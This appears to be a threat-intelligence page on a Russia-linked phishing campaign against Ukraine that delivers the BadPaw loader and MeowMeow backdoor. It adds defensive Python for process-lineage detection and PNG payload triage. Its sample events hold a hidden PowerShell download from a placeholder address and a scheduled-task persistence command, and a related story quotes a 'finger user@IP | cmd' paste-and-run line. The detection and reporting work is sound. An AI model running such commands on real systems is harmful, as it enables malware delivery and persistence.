Mallory

Russian Phishing Campaign Targets Ukraine With BadPaw Loader and MeowMeow Backdoor

Tags: phishing-campaign-intelligence, loader-delivery-mechanism, remote-access-implant, defense-evasion-method, state-sponsored-espionage
Updated March 21, 2026 at 02:12 PM (2 sources)

A Russia-linked phishing campaign has targeted Ukrainian entities with emails that lure recipients into downloading a ZIP archive, leading to the installation of two newly identified malware families: the BadPaw loader and the MeowMeow backdoor. Reporting based on ClearSky's analysis describes messages sent from addresses hosted on the Ukrainian mail service ukr[.]net, with a link that redirects to a ZIP archive carrying a Ukraine-themed border checkpoint permit lure. Opening the archive launches a disguised HTA that shows the decoy document while running the malicious stages in the background; those stages download BadPaw, which establishes command-and-control (C2) and deploys MeowMeow.

The chain is built to complicate analysis and evade detection. ClearSky reported BadPaw as a .NET-based loader protected with the .NET Reactor packer/obfuscator, while MeowMeow provides backdoor functionality including file enumeration and file read, write and delete operations. Further anti-analysis measures include conditional execution (components stay inert unless launched with specific parameters) and environment checks in MeowMeow that look for sandboxes and analysis tooling such as Wireshark, ProcMon and Fiddler. Based on infrastructure and tradecraft indicators (including the ukr[.]net-hosted sender addresses), researchers tied the activity to Russian espionage actors and, with lower confidence (reported as low to moderate), to APT28 (aka Fancy Bear, Forest Blizzard, Blue Delta).
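The chain described above leaves a sequence of process events a defender can correlate: mshta.exe started on a file extracted from an archive, a script host or downloader spawned beneath it, and a scheduled task created from that lineage. The following script is an added example, not code from the report or from ClearSky. It runs three such rules over a handful of constructed process-creation events (the user name, file paths, task name and the TEST-NET address 203.0.113.10 are placeholders, not indicators from the report) and returns the matches; the field names loosely follow the Sysmon Event ID 1 shape.

```python
import re

# Constructed sample process-creation events (hypothetical: paths, user name, task
# name and the TEST-NET address are placeholders, not indicators from the report).
# Shape loosely follows Sysmon Event ID 1: pid, ppid, image path, command line.
SAMPLE_EVENTS = [
    {"pid": 4001, "ppid": 3200, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # HTA opened straight out of the ZIP (Explorer extracts it to a Temp folder first)
    {"pid": 4120, "ppid": 4001, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\user\AppData\Local\Temp\Temp1_lure.zip\lure.hta"'},
    # background stage fetches an image that carries the next payload
    {"pid": 4133, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -ep bypass -c "iwr http://203.0.113.10/i.png -OutFile $env:APPDATA\i.png"'},
    # persistence; "--run" is a placeholder for the launch parameter the loader insists on
    {"pid": 4140, "ppid": 4133, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /sc minute /mo 15 /tn "Updater" /tr "C:\Users\user\AppData\Roaming\svc.exe --run"'},
    # benign control: an HTA run from a program directory by an installer
    {"pid": 5000, "ppid": 4001, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]

USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public)\\", re.IGNORECASE)
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "curl.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(pid, by_pid):
    """Yield parent, grandparent, ... as long as each is present in the event set."""
    seen = set()
    ev = by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        yield ev


def detect(events):
    """Return (rule, pid) pairs. Rules:
      hta_from_user_writable_path  mshta.exe given a script under Temp/AppData/Downloads
      interpreter_under_hta        script host or downloader anywhere beneath such an mshta
      scheduled_task_under_hta     schtasks /create anywhere beneath such an mshta
    """
    by_pid = {e["pid"]: e for e in events}
    alerts, suspicious_hta = [], set()
    for e in events:
        if basename(e["image"]) == "mshta.exe" and USER_WRITABLE.search(e["cmd"]):
            suspicious_hta.add(e["pid"])
            alerts.append(("hta_from_user_writable_path", e["pid"]))
    for e in events:
        if e["pid"] in suspicious_hta:
            continue
        if not any(a["pid"] in suspicious_hta for a in ancestors(e["pid"], by_pid)):
            continue
        name = basename(e["image"])
        if name in INTERPRETERS:
            alerts.append(("interpreter_under_hta", e["pid"]))
        if name == "schtasks.exe" and re.search(r"/create\b", e["cmd"], re.IGNORECASE):
            alerts.append(("scheduled_task_under_hta", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:30} pid={pid}")
```

The lineage walk matters more than the mshta.exe match on its own: the report says the later components stay inert unless launched with specific parameters, so the child-process and task-creation events are where the chain becomes visible even when the loader itself does nothing in a sandbox. The sample's `--run` switch is a placeholder for that behaviour, not a real BadPaw or MeowMeow argument.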

Timeline

  1. Mar 5, 2026

    ClearSky attributes Ukraine-targeting campaign to a Russia-linked espionage actor

    ClearSky assessed with high confidence that the operation is linked to a Russian cyberespionage group, citing Ukrainian targeting, Russian-language code artifacts, and overlaps with prior Russian tradecraft. Attribution specifically to APT28 was weaker: one report describes it as low confidence and another as low to moderate confidence.

  2. Mar 5, 2026

    Researchers disclose technical details of BadPaw and MeowMeow malware

    Analysis showed that the lure is a disguised HTA file that displays a Ukrainian-language border-crossing decoy while executing the malicious stages: sandbox-evasion checks, scheduled-task persistence, and steganographic extraction of a hidden payload from an image. Researchers said BadPaw acts as a .NET loader that establishes command-and-control and deploys MeowMeow, an advanced backdoor with anti-analysis checks and file access capabilities.

  3. Mar 5, 2026

    Russian phishing campaign targets Ukrainian organizations with new malware

    Researchers reported a phishing campaign targeting Ukrainian entities using emails from ukr.net-hosted addresses and links to a ZIP archive disguised as a Ukrainian border checkpoint permit. The infection chain delivers the newly identified BadPaw loader, which then installs the MeowMeow backdoor.
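The second timeline item says a hidden payload is pulled out of an image by steganography; the reporting summarized here does not say how the payload is embedded. The following is an added example, not code from the report or from ClearSky, showing the simplest triage a practitioner applies to a suspected carrier image: walk the PNG chunk structure with CRC verification, return whatever follows the IEND chunk, and classify it. It builds its own minimal PNG and appends a constructed payload so it runs offline. This only catches data appended after the image; true LSB-style embedding would pass this check and needs pixel-level analysis instead.

```python
import math
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """One PNG chunk: big-endian length, 4-byte type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(width: int = 2, height: int = 2, trailer: bytes = b"") -> bytes:
    """Constructed minimal 8-bit RGB PNG (solid red). `trailer` is appended after IEND
    to simulate a carrier image with a payload tacked onto the end."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # depth 8, colour type 2 (RGB)
    rows = b"".join(b"\x00" + b"\xff\x00\x00" * width for _ in range(height))  # filter 0 per row
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(rows))
            + _chunk(b"IEND", b"") + trailer)


def walk_png(blob: bytes):
    """Parse chunks up to IEND, verifying each CRC. Returns (chunk types, trailing bytes)."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(blob):
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        ctype = blob[pos + 4:pos + 8]
        end = pos + 12 + length
        if end > len(blob):
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        data = blob[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:end])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"CRC mismatch in chunk {ctype!r} at offset {pos}")
        chunks.append(ctype)
        pos = end
        if ctype == b"IEND":
            break
    return chunks, blob[pos:]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is uniform, which compressed or encrypted payloads approach."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def classify_trailer(trailing: bytes) -> str:
    """Coarse verdict on bytes found after IEND."""
    if not trailing:
        return "none"
    if trailing.startswith(b"MZ"):
        return "pe-header"
    if len(trailing) >= 64 and shannon_entropy(trailing) > 7.0:
        return "high-entropy"
    return "other"


def triage_image(blob: bytes) -> dict:
    chunks, trailing = walk_png(blob)
    return {"chunks": chunks, "trailing_len": len(trailing),
            "verdict": classify_trailer(trailing), "trailing": trailing}


if __name__ == "__main__":
    payload = b"MZ" + bytes(range(256))  # constructed stand-in for a hidden stage
    for name, img in (("clean", build_png()), ("carrier", build_png(trailer=payload))):
        r = triage_image(img)
        print(name, r["chunks"], r["trailing_len"], r["verdict"])
```

A carrier that decodes in an image viewer and still carries hundreds of high-entropy bytes after IEND is worth pulling for analysis; a CRC failure on an otherwise well-formed file is a second signal, since payload-carrying tools sometimes patch chunk data without recomputing the checksum.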

Related Stories

APT28-Linked Phishing Campaign Deploys BadPaw Loader and MeowMeow Backdoor Against Ukraine

ClearSky reported a suspected Russian espionage campaign targeting Ukrainian entities using phishing emails that deliver two previously undocumented malware families: the **BadPaw** loader and the **MeowMeow** backdoor. The infection chain begins with a lure email (sent from a `ukr[.]net` address so it appears credible) containing a link that first loads an unusually small image functioning as a tracking pixel to confirm user interaction, then redirects the victim to download a ZIP archive. When opened, the archive launches an HTA that displays a Ukrainian-language decoy document about border-crossing appeals while executing background stages that deploy the .NET-based BadPaw loader, which then retrieves and installs the MeowMeow backdoor from a remote server; the HTA also performs sandbox/analysis-evasion checks. The activity was attributed with **moderate confidence** to **APT28** based on targeting, geopolitical lures, and technique overlaps with prior Russian operations. Separate reporting also noted CERT-UA warnings about other phishing-driven malware activity against Ukrainian government institutions (including **SHADOWSNIFF**, **SALATSTEALER**, and a Go backdoor **DEAFTICKK** attributed to **UAC-0252**), but that campaign is distinct from the BadPaw/MeowMeow intrusion chain and should not be conflated with the APT28-linked activity.

1 month ago
Void Blizzard (Laundry Bear) Charity-Themed Lures Deliver PluggyApe Backdoor to Ukraine’s Defense Forces

Ukraine’s CERT (CERT-UA) reported a cyber-espionage campaign targeting representatives of **Ukraine’s Defense Forces** between October and December 2025, using social-engineering lures themed around charitable foundations. Victims were contacted via **Signal** and **WhatsApp** and directed to charity-impersonation websites or sent password-protected archives that purported to contain documents but instead delivered executable payloads (including `*.docx.pif`), sometimes sent directly through the messaging apps. The activity was attributed with **medium confidence** to the Russia-aligned threat actor **Void Blizzard** (also tracked as **Laundry Bear** and **UAC-0190**). The campaign deployed a previously undocumented backdoor dubbed **PluggyApe**, built as a Python executable packaged with **PyInstaller**, which profiles infected hosts, establishes persistence via **Windows Registry** modification, and enables remote command execution. CERT-UA noted an evolution in late 2025 from earlier loader naming patterns (e.g., `*.pdf.exe`) to **PIF-based delivery** and an updated **PluggyApe v2** featuring stronger obfuscation, **MQTT-based** command-and-control, and additional anti-analysis checks.

1 month ago
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads

Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.

1 month ago
